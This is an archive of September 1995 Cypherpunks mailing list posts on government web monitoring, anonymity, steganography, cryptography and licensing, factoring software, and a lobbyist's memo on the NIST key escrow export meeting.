> | Oh please!  Some clerk browses the internet and you don't want to respect
> | their privacy because of the IRS?  This makes sense how?  I suppose that
> | you're going to dig up information about me and spread it around the 
> | internet because you have issues about the company I work for?
> 
> 	First off, I was being somewhat sarcastic, as you might have
> noticed from several things, not the least of which was the phrase
> 'sarcasm aside.' 
> 
> 	That said, why should I respect the privacy of government
> employees?  There is a substantial difference between government and
> private companies, in that I am not compelled in any way to do
> business any private company.
> 
> Adam

Someone is making you let users at government sites browse your website?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 12:53:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Corporate Use of Anon WWW Proxies
Message-ID: <9509131953.AA19241@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[I pulled this from the firewalls list (use majordomo@greatcircle.com to join)]

Alex Eveleigh <Alex.Eveleigh@kellogg.com> writes:
> Subject: Monitoring Activity on the Internet
[...]
>      I would like to get some opinions on how easy it would be for someone 
>      to monitor what information is being accessed on the Internet by our 
>      company. For example how easy would it be for our competition monitor 
>      all sites that people in our company are accessing and what 
>      information we are pulling off the Internet.

This struck me as rather ironic in the wake of The Govt. Could Be Reading
_Your_ Home Page. It also sparked me to draw the short connection between
industrial espionage (and simple industrial nosiness), and anonymous Web
proxies. An obvious point, really, but companies often have an interest in
concealing the nature/extent of their Web crawlings, too. Perhaps there's a
market niche, or a few pro-anonymity publicity points, here for someone.

-Futplex <futplex@pseudonym.com>
"Everybody's got something to hide except for me and my monkey" -J.L. & P.McC.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@europages.com
Date: Wed, 13 Sep 95 06:47:39 PDT
To: cypherpunks@toad.com
Subject: Majordomo results: (NOISE) Re: White House MONITORS Web Pag
Message-ID: <9509131453.AA14290@europages.com>
MIME-Version: 1.0
Content-Type: text/plain


--

>>>> This is NOISE !
**** Command 'this' not recognized.
>>>> 
>>>> DAMION FURI writes:
**** Command 'damion' not recognized.
>>>> >         Maybe so, but we don't have to like it.  And I don't.  But
**** Command '>' not recognized.
>>>> >         it's not so much their access, per se, that I object to.
**** Command '>' not recognized.
>>>> 
>>>> Why the hell do you care ?  Someone has a home page for something on the Web.
**** Command 'why' not recognized.
>>>> Someone at the White House looks at it. So what ?  You object to the fact
**** Command 'someone' not recognized.
>>>> that somebody in the government has a Web browser and *gasp* uses it to read
**** Command 'that' not recognized.
>>>> stuff on the WWW ???
**** Command 'stuff' not recognized.
>>>>   
>>>> >	It's their potential intentions, 
**** Command '>' not recognized.
>>>> 
>>>> You take moral offense to what you think someone else _might_ be thinking ?  
**** Command 'you' not recognized.
>>>> Sounds like you believe in thoughtcrime. Banned any good books lately ?
**** Command 'sounds' not recognized.
>>>> 
>>>> > 	all things considered, and
**** Command '>' not recognized.
>>>> >         the fact that they aren't at all open about such monitoring.
**** Command '>' not recognized.
>>>> 
>>>> This is absurd. You expect the White House to issue a press release every time
**** Command 'this' not recognized.
>>>> a staffer clicks on a URL ?  
**** Command 'a' not recognized.
>>>> 
>>>> 	"WASHINGTON (UPI) The Clinton Administration unveiled plans today to
**** Command '"washington' not recognized.
>>>> 	add several new sites to the White House bookmarks list. At a hastily
**** Command 'add' not recognized.
>>>> 	arranged press briefing this morning, Defense Secretary William Perry 
**** Command 'arranged' not recognized.
>>>> 	told reporters that the changes would be implemented in close 
**** Command 'told' not recognized.
>>>> 	consultation with NATO allies. There was little immediate reaction 
**** Command 'consultation' not recognized.
>>>> 	from Capitol Hill. Members on both sides of the aisle said they 
**** Command 'from' not recognized.
>>>> 	needed time to study the proposal in detail."
**** Command 'needed' not recognized.
>>>> 
>>>> Someone please tell me this is just an extremely premature April Fool's joke...
**** Command 'someone' not recognized.
>>>> 
>>>> -Futplex <futplex@pseudonym.com>
END OF COMMANDS
**** Help for majordomo:

This is Brent Chapman's "Majordomo" mailing list manager, version 1.93. 

In the description below items contained in []'s are optional. When
providing the item, do not include the []'s around it.

It understands the following commands:

    subscribe <list> [<address>]
	Subscribe yourself (or <address> if specified) to the named <list>.

    unsubscribe <list> [<address>]
	Unsubscribe yourself (or <address> if specified) from the named <list>.

    get <list> <filename>
        Get a file related to <list>.

    index <list>
        Return an index of files you can "get" for <list>.

    which [<address>]
	Find out which lists you (or <address> if specified) are on.

    who <list>
	Find out who is on the named <list>.

    info <list>
	Retrieve the general introductory information for the named <list>.

    lists
	Show the lists served by this Majordomo server.

    help
	Retrieve this message.

    end
	Stop processing commands (useful if your mailer adds a signature).

Commands should be sent in the body of an email message to
"majordomo".

Commands in the "Subject:" line NOT processed.

If you have any questions or problems, please contact
"Majordomo-Owner".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Sep 95 13:08:02 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Minor Risk to LSB Steganography
Message-ID: <9509132007.AA19945@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Last week I attended a lecture given by Dexter Kozen at Cornell, on 
"Efficient Algorithms for Optimal Transmission of Video Data". He
mentioned in passing a couple of approaches to choosing data that may 
acceptably be lost in the process (i.e. without excessive picture quality
degradation). One scheme (which I believe counts as a "corona method") 
involves simply discarding the LSBs of all the encoded pixels or whatnot. 
This method was not at all a focus of the talk. Anyway, I thought
I'd mention it as another minor potential threat to the use of LSB
steganography in video transmission, e.g. MPEG streams.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Sep 95 07:15:44 PDT
To: cypherpunks@toad.com
Subject: Dirty Jobs Ad
Message-ID: <199509131415.QAA00857@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NY Times, Sept 13, 1995. For the outawork:


C.I.A.'s Chief Calls Covert Action a Must

Washington, Sept. 12 -- The Central Intelligence Agency
will maintain, and perhaps increase, its covert
operations abroad and continue to hire informers from
terrorist cells, military regimes and drug syndicates,
the new Director of Central Intelligence said today.

The Director, John M. Deutch, called espionage "the core
mission of the Central Intelligence Agency." That mission
has been questioned by critics of the C.I.A. in Congress
and the foreign-policy establishment, who wonder whether
the rewards of secret information are worth the risks of
undertaking covert operations and recruiting murderous
and corrupt foreign agents.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott M Fabbri <m1smf99@FRB.GOV>
Date: Wed, 13 Sep 95 13:48:22 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
In-Reply-To: <199509131857.OAA08914@panix.com>
Message-ID: <9509132022.AA27925@arcss5.FRB.GOV>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 13 Sep 95 08:50:17 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
In-Reply-To: <Pine.A32.3.91.950913102622.32299A-100000@pangloss.ims.advantis.com>
Message-ID: <Pine.SOL.3.91.950913163953.25308J-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Henry W. Farkas wrote:
 
> If decrypted with the "alternate" or "fake" secret key, the encrypted file
> is wiped until it reaches a marker; the remainder of the file is
> displayed.  If you use your "primary" or "real key", the extraneous text
> is simply stripped.

Useless I'm afraid.  They have the source code and have disabled your
"feature" and attached loud alarm bells to it.

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Wed, 13 Sep 95 14:21:23 PDT
To: dcl@panix.com (David C. Lambert)
Subject: Re: An opportunity not to be missed
In-Reply-To: <199509131857.OAA08914@panix.com>
Message-ID: <9509132119.AA03389@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Of course, an organized campaign on the Net is essentially free,
| but for the cost in time.  It is my opinion that the political power
| of the Net is just starting to awaken, and that a perception of
| impotence in the political process, is just that - a perception.

	An organized campaign anywhere, for any purpose, is not free,
since it will require good people to run and organize it.  The Key
cracking ring only did what we all knew it could do becuase Hal, Adam
and several other good folks took the time to do it.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Wed, 13 Sep 95 14:33:33 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509131539.AA17341@cantina.verity.com>
Message-ID: <9509132131.AA03432@waller.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


(Phill Hallam Baker's request that we respect the privacy of
Government employees started this thread)

| > 	Sure.  I'll respect their privacy as much as they, and the
| > organizations they oversee, respect mine.  I'll use as the
| > respresentative organizations the IRS and the Social Security
| > Administration, which respects my pricvacy so much that they use
| > prison inmates to process paperwork.
| > 
| > 	If I was in a nasty mood, I'd add the USPS.
| > 
| > 	Sarcasm aside, they show no interest in other people's
| > privacy.  Why should we go out of our way to do anything but show them
| > how bad the situation is?

| Oh please!  Some clerk browses the internet and you don't want to respect
| their privacy because of the IRS?  This makes sense how?  I suppose that
| you're going to dig up information about me and spread it around the 
| internet because you have issues about the company I work for?

	First off, I was being somewhat sarcastic, as you might have
noticed from several things, not the least of which was the phrase
'sarcasm aside.' 

	That said, why should I respect the privacy of government
employees?  There is a substantial difference between government and
private companies, in that I am not compelled in any way to do
business any private company.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 13 Sep 95 17:05:23 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510103ac7d2135f391@[198.59.115.127]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote,
>But won't clients insist on proper credentials in one form or another?

     Yes.

>Doesn't the practicality and accountability of a centralized authority
>(or several authorities) provide the best answer to this?

     No.

>Who is going
>to accept my signature promising that I did indeed get a law degree and
>pass the bar?

     Very few.

     Certification can be from multiple private and
     government organizations and might vary depending
     on the type of legal service (or other lawyer service)
     needed.  Licensing can only be done by an
     entity that can use physical force to prevent
     buying and selling legal services.


>I don't see how the net will eliminate the basic need for highly
>qualified professionals and the proof that they have credentials.

     It won't.  The needs might shift a little but they
     will be there.

>Perhaps diplomas and such will be transfered into digital signatures for
>the institutions, but I can't see how this "cracks" any "monopoly."
>Perhaps the monopoly is shifted to those who have diplomas, rather than
>those "licensed to practice" but so what?

     It might "crack" government enforced monopoly.
     Should a market monopoly survive some form of
     crypto-anarchy it would be in the form of a
     certification entity that does such a good and
     efficient job that it is very hard to break
     into the business.  Not so bad if it happens,
     but much more honest, efficient and softer-edged
     than "licensed to practice".  I suspect that
     people have needs for varying levels and varying
     specializations so that several kinds of
     certifications may develop and might be supplied
     by multiple entities.

     I suspect that many people would want a
     certification that a lawyer meets the usual
     licensing requirements of the outside world.
     Who knows, maybe that would be the most popular kind.
     But it won't be the only kind.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 13 Sep 95 15:11:28 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950907233749.7150A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950913180804.6269A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 7 Sep 1995, Duncan Frissell wrote:

> 
> On Thu, 7 Sep 1995, Black Unicorn wrote:
> 
> > Telecoms will certainly break the professional 
> > > monopoly of lawyers (and other professionals).
> > 
> > This I don't.  How do you mean exactly?
> 
> Licensing requires the ability to outlaw unlicensed transactions.  
> Since the Net trumps censorship and allows consultations at a 
> distance, it cracks licensing,


But won't clients insist on proper credentials in one form or another?  
Doesn't the practicality and accountability of a centralized authority 
(or several authorities) provide the best answer to this?  Who is going 
to accept my signature promising that I did indeed get a law degree and 
pass the bar?

I don't see how the net will eliminate the basic need for highly 
qualified professionals and the proof that they have credentials.  
Perhaps diplomas and such will be transfered into digital signatures for 
the institutions, but I can't see how this "cracks" any "monopoly."  
Perhaps the monopoly is shifted to those who have diplomas, rather than 
those "licensed to practice" but so what?

> 
> DCF
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Wed, 13 Sep 95 16:09:12 PDT
To: bdavis@thepoint.net
Subject: CAGK rationale (was: Re: GAK/weak crypto rationale?)
In-Reply-To: <199509132001.NAA02021@comsec.com>
Message-ID: <9509132212.AA28200@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>

>  In our district, we 
>managed to convict almost 20 people in an investigation of the state 
>legislature, including the now-former Speaker of the House and > 6 other 
>legislators.  Bribing lobbyists took hits, etc.
>
>Particularly effective were the court-approved video and audio tapes of 
>the Speaker taking a bribe in exchange for certain action on legislation 
>and responding to the bribing party:   "Well bless your heart."
>That has become the office's mantra.

Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with
all gov't officials forced to use keys held by various newspapers and
other watchdog agencies....

The video and audio bugs aren't part of the wiretap process so they don't
apply here.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 13 Sep 95 15:19:26 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <199509132121.OAA05728@netcom23.netcom.com>
Message-ID: <9509132218.AA25328@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I suspect that a lot of this Foster stuff is going to hit the media big
>time when the mud starts to sling during the presidential election,
>when it really counts. I think that someone is sitting on a lot
>of anti-clinton ammo. the 3rd candidate possibilities are very strong
>in 96, because of all the junk coating the Republicrats and Demopublicans.

I don't think that there will be anything on Foster, if anyone had anything they 
would have used it. All that has come up is that some of Fosters files marked 
secret were placed in a safe after he committed suicide. 

What is going to happen is that a lot of the mud is going to get rebutted, on 
both sides. Take the Hillary Clinton Cattle deals for example, the media claim 
was that Hillary invested $1,000 and made $100,000. This is not true. She was 
asked to put up $1,000 as margin by her broker. Margin is not invested, it is 
simply a down payment on risk capital. Her broker knew that Hilary could cover 
very much more if there was a margin call. Hillary was selling options not 
buying them. In the selling game you have unlimited liability but can only make 
a fixed profit. If you lose selling an option the money is only due at the end 
of the contract. So Hillary did not invest $1000, in fact she invested nothing, 
but she did put up her entire assets as risk capital just as a Lloyds name does 
in the insurance market.

The key question is whether the kooks win and the net just degenerates into 
conspiracy theories and so nobody takes any notice of really heinous stuff or 
whether the net injects some facts into the political debate. The net can be 
used for both allegations and rebuttal. That type of environment would 
constitute a genuine information democracy.


>the Whitehouse web hits are potentially interesting. I agree they
>don't imply any "dissident web monitoring program". the question of
>how high a staffer hit those pages and for what reasons is still
>unanswered.

High ups have better things to do with their time than watch conspiracy 
theorists blather on. Underlings as not net.enabled. 

If you think thats bad check out the Congress, they have a limit on the number 
of Internet enabled staffers per senator and congressbeing. I keep trying to get 
the message across about T3 lines but they don't seem to get the message. 

Ever wondered why these poor folks can't use email for their organisations..?


If you are wondering about the cypherpunkness of all this I think that these 
guys should all be using PGP. I'm very carefull to give them the url for the 
European distribution site however :-)

Adam writes:

>	That said, why should I respect the privacy of government
>employees?  There is a substantial difference between government and
>private companies, in that I am not compelled in any way to do
>business any private company.

Like I have a choice of going to Comonwealth gas or not having any lights in the 
appartment...


	Phill H-B

Not speaking for anyone else.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 13 Sep 95 18:20:58 PDT
To: cypherpunks@toad.com
Subject: "Who knows this guy?"
Message-ID: <ac7cd13119021004b9e2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 AM 9/14/95, don@cs.byu.edu wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Just saw this on Usenet, was wondering who knows this guy. Obviously not
>a cpunk or it would have hit the list right away. Not in the mood to run
>code on my account without knowing that I know what it will do.
>
>
>From: bobs@mathworks.com (Bob Silverman)
>Newsgroups:
>sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithme
>tic

It's funny, this thing about names and reputations.

You see, I know the name "Bob Silverman," and his company, Mathworks, a
whole lot more than I know the name "don@cs.byu.edu". Mathworks was heavily
in the news last fall during the Pentium debacle (including someone I used
to know from Intel, Cleve Moler).

I've only seen the posts of "don@cs.byu.edu" since 8-29-95, just the last
two weeks. (I don't claim to have a complete archive, as I delete a lot of
stuff. But this is the earliest don@cs.byu.edu post I can find.)

Certainly I am not impugning the reputation of don@cs.byu.edu, just noting
the irony of him asking for if anyone knows who Bob Silverman is. Strange
days.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Wed, 13 Sep 95 17:39:41 PDT
To: cypherpunks@toad.com
Subject: Factoring Software (fwd)
Message-ID: <199509140039.SAA00376@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just saw this on Usenet, was wondering who knows this guy. Obviously not
a cpunk or it would have hit the list right away. Not in the mood to run
code on my account without knowing that I know what it will do.


From: bobs@mathworks.com (Bob Silverman)
Newsgroups: sci.math,sci.crypt,alt.security.pgp,sci.math.num-analysis,comp.arch.arithmetic
Subject: Factoring Code
Date: 13 Sep 1995 09:22:38 -0400
Organization: The MathWorks, Inc., Natick, MA 01760
Lines: 41
Distribution: inet
Message-ID: <436luu$3lu@puff.mathworks.com>
NNTP-Posting-Host: puff.mathworks.com

Several people have requested factoring code recently. After thinking
about it I have decided to offer a deal.

I do not have the machine resources I once had, and have some numbers
that I would like factored. They are in the 80-90 digit range. My
code will do an 85 digit number in about 500 hours on a single Sparc-10.
The code is perfectly parallelizable, so 40 machines will do 85 digits
overnight.
Run time for QS can vary by a factor of 2.5 depending on how "rich" 
the number being factored is in small quadratic residues.


I will make available my complete Multiple Polynomial Quadratic Sieve
code, along with instructions, to anyone who will factor at least one
of these numbers. This code includes the siever, the code to combine
large primes, the matrix solver (a naiive Gaussian elim over GF(2), but
one which solves a 25K x 25K system in 15 min on a single Sparc), and
the code to multiply everything together and find the factors. I will
also throw in a routine which reads the output file and scans for bad
relations. Sometimes, when running on many machines, I/O errors creep
into the output files. A machine can go down when writing a record, or
there can be a network problem etc. I also have a program which
excizes bad records in the output files And one which sets up multiple
sub-directories with the proper data files so one can run in parallel.

Also included is a program which scans the output files in these
multiple sub-directories and counts the number of relations found.
There is also a program to predict (fairly accurately!) how close to
done you are based on output from the counting program.

This code will also include a decent collection of fast, very portable
multiple precision routines.

All this is for the taking if you guarantee to factor just one number for
me.

- -- 
Bob Silverman
The MathWorks Inc.
24 Prime Park Way
Natick, MA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFd5fsLa+QKZS485AQELHAL/QS2LizHGSzT7h3b8cU78GiR9QLoaQ6zf
FEEyt8XRDFqlUe7CKFfDKB1SPPviAZeBPM4XDfswfvfXpKNLamZQUNc7VYgzPIC0
3knFeQf2A/zWuGBZQp/TM0xBcwKW5lW7
=Zyke
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin C Sweitzer <msew+@andrew.cmu.edu>
Date: Wed, 13 Sep 95 15:53:22 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <9509131434.AA23717@toad.com>
Message-ID: <8kJq22C00awF0=Na15@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from cypherpunks: 13-Sep-95 CYPHERPUNK considered harmful. by
"Peter Trei"@process.com 
>      We call ourselves 'cypherpunks'. While this is derived from the SF
> term 'cyberpunk', consider the image we are creating for ourselves:
>  
>      A 'punk' is a marginalized young adult, one who rejects the norms
> of his or her society, and takes delight in irking those around him with
> his or her rejection. The older of us will think of James Dean in 'Rebel
> Without a Cause', or Brando in 'The Wild One'. Later, you get images
> such as Peter Fonda in 'Easy Rider', and more recently, Sid Vicious and
> other icons of the 'punk rock' movement.


Never EVER judge a book by its cover.


People that do usually end up being Joe Sixpacks.  And by being a Joe
Sixpack you don't have that much power in today's society.


Martin S




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Sep 95 18:59:19 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509140159.SAA16728@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>On Wed, 13 Sep 1995, David C. Lambert wrote:
>
>> I propose that we get some likely candidate (actually, a similar candidate
>> to the one above) to advocate the benefits of anonymity on the net.  

Is Wavy Gravy running his "Nobody for President" campaign again this time?
After all, Nobody's going to balance the budget, and Nobody's going to
get the government out of your bedroom, and on the internet, Nobody can tell
if you're a dog or not :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Sep 95 18:59:30 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <199509140159.SAA16796@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This whole flap reminds me of the days it was discovered that
the FBI was buying Usenet access, on tape monthly rather than online.

>(Phill Hallam Baker's request that we respect the privacy of
>Government employees started this thread)

Yup.  It would be nice to know what our employees are doing
with all this fancy equipment we've bought them, but on the other
hand, I'd far rather have them seeing the abuse the net gives
them in person rather than having to have the FBI or some other
filtering bureaucracy explain to them what the net all about ...
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 13 Sep 95 19:00:28 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509140159.SAA16862@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:46 PM 9/12/95 -0400, Brian Davis wrote:

>> > I don't doubt that wiretaps may sometimes be abused despite the 
>> > incredibly onerous review process, but they have positive aspects, too.
>> 
>> In how many of these cases did you fail to get the necessary information
>> because of encryption?  Has this proportion been changing over the years?
>
>I wasn't personally involved in any of the cases, but I suspect the 
>answer re encryption is zero.  There was the time the FBI agent failed to 
>push the record button, however.
>My response was to the wiretap correlation to career-making cases.  
>I don't believe encryption is widespread enough yet to be a serious problem 
>in the Title III area.  It is a potential problem, though, as encryption 
>(rightfully) spreads.  

You're probably right.  On the other hand, especially as dealers in
politically incorrect substances get better privacy technology,
this will become much more of an issue, and I get the impression from
what I read in the papers that big drug busts, arrests of major
organized crime figures, and the rare terrorist cases are probably
big career wins for the police agents and prosecutors involved.

>The question I am debating with myself, with all 
>of your help, is what the policy "ought to be."

As you might guess, I think the government makes lots of laws about
things that are not their business, and wiretaps and other privacy
invasions are especially useful for prosecuting victimless crimes and 
dissident political groups, since none of the participants call the cops.
On the other hand, I've had friends whose businesses have been burned 
down by the Mafia, and don't like murderers bombing pubs, either,
and stopping people like that is legitimate police business.

However, I think the moral case is very clear that people have the
right to communicate freely and privately, and to use whatever
technology or languages they want to to attempt to do so;
any government that would try to prevent that is more of a threat
to freedom than a benefit.  And police have had a lot of success with
informants, and new technology has really improved equipment for
bugging suspects- if you folks do your jobs honestly and apologize
when you make mistakes about invading incorrect suspects' privacy,
go ahead and use it.

The really gray areas are things like widespread coordinated
surveillance of public activities - cameras in the subways, etc.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 13 Sep 95 19:19:19 PDT
To: cypherpunks, gnu
Subject: Ron Plesser's take on NIST GAK meeting
Message-ID: <9509140219.AA09487@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I converted a document in some proprietary Windows binary format to ASCII.
Formatting mistakes are mine.

Ron Plesser is a very experienced lobbyist.  He was involved in the
passage of the ECPA, among other things.  He's CIX's lawyer, and sent
this document to CIX (the Commercial Internet Exchange), which passed
it on to its membership.

	John Gilmore


PIPER & MARBURY L.L.P.  Memorandum

To:  Interested Parties
From:  Ron Plesser
Date:  September 11, 1995
Subject:  NIST Key Escrow Encryption Meeting

The National Institute of Standards and Technology on September 6 and 7
held a meeting on issues regarding key escrow encryption, focusing on
export criteria for software and desirable characteristics for U.S. key
escrow agents.  Ten draft software key escrow export criteria were put
forth by NIST for consideration and possible revision (see below).  Key
escrow encryption is the recent Administration proposal for an
alternative to Clipper Chip, which industry opposed.  Key escrow would,
in the Administration's view, allow the export of software with strong
encryption.  In summary, the government would permit the general
licensing of 64-bit-key encryption provided that it be manufactured
with a key that would be maintained by independent escrow agents who
were certified by the U.S. government.  Foreign escrow agents could be
used where there was a bi-lateral agreement with the particular country
involved.

NIST Deputy Director Ray Kammer provided an overview of the goals of
the meeting, and said that NIST plans to issue a Federal Register
notice containing a "revised set of thoughts" in three weeks.  There
will be a 60-day comment period following publication of the revised
principles in the Federal Register.  The  NIST will then review the
comments received and determine whether there is enough consensus to
proceed.  There will be additional meetings on September 15, 1995 to
discuss the Federal government's requirements for its own information
processing standards for key escrow encryption.  This meeting will take
place at the Gaithersburg, Maryland Hilton Hotel from 9:00 a.m. to 5:00
p.m.

It was clear from the meeting, both in presentations and conversation
during breaks, that most computer systems and certainly those used by
large entities will have key escrow systems for encryption.  There was
even a person who spoke who said that they are doing this now.  Many
people at the meeting acknowledged that key escrow would be implemented
at some point for domestic as well as for exported programs.  The issue
is who would hold the key.  For example, could a company hold its own
keys or could an independent agent be used?

The people who create mass market software, however, still expressed
significant opposition to key escrow.  While the government went to
some length to express that this solution is neutral as to software or
hardware, it has to be acknowledged that hardware-based systems are
easier to control.

The subject that was not well discussed was encryption in relation to
network services and the internet.  It was discussed in relation to the
issues of interoperability and the ability to decrypt both sides of a
communication.

The assumption that I and others had at the outset was that the
Administration had made progress in the last year in raising itself
from the ashes of Clipper Chip.  By the end of the meeting that was not
altogether clear.  There will remain a great deal of controversy
surrounding this issue.  Congress is sure to get involved and it will
get messier before it gets resolved.

Administration Comments

Mike Nelson, who is special assistant for information technology to the
White House Office of Science and Technology Policy and co-chair of the
inter-agency working group on encryption, provided a historical
overview of the data encryption issue.  He said that the proposed
64-bit-key encryption is 17 million times stronger than the 40-bit-key
encryption currently allowed to be exported.  Under the proposed
policy, software with 64-bit-key encryption could be exported to
friendly countries under certain conditions, all of which require that
a key to that encryption be available in the U.S. from an independent
third-party.  Mr. Nelson stated that the new policy will open up new
market opportunities for the U.S. computer software industry, and that
key escrow has the potential to become a de facto global standard.  The
Administration policy for 40-bit-key encryption will continue as-is,
and no keys will have to be escrowed for such systems.  Mr. Nelson said
that the government's main concern is that strong encr

In response to questioning, Mr. Nelson stated that the 64-bit-key limit
is being imposed because the government is not certain that the key
escrow system will work.  Once the system is up and running, longer
keys may be allowable.  He said that the draft criteria are based on
national security needs, and that they were pushed as far as possible
to meet commercial needs.  Mr. Nelson added that the Administration is
discussing the possibility of federal legislation with Hill staff to
avoid varying state laws on encryption.

Industry Perspectives

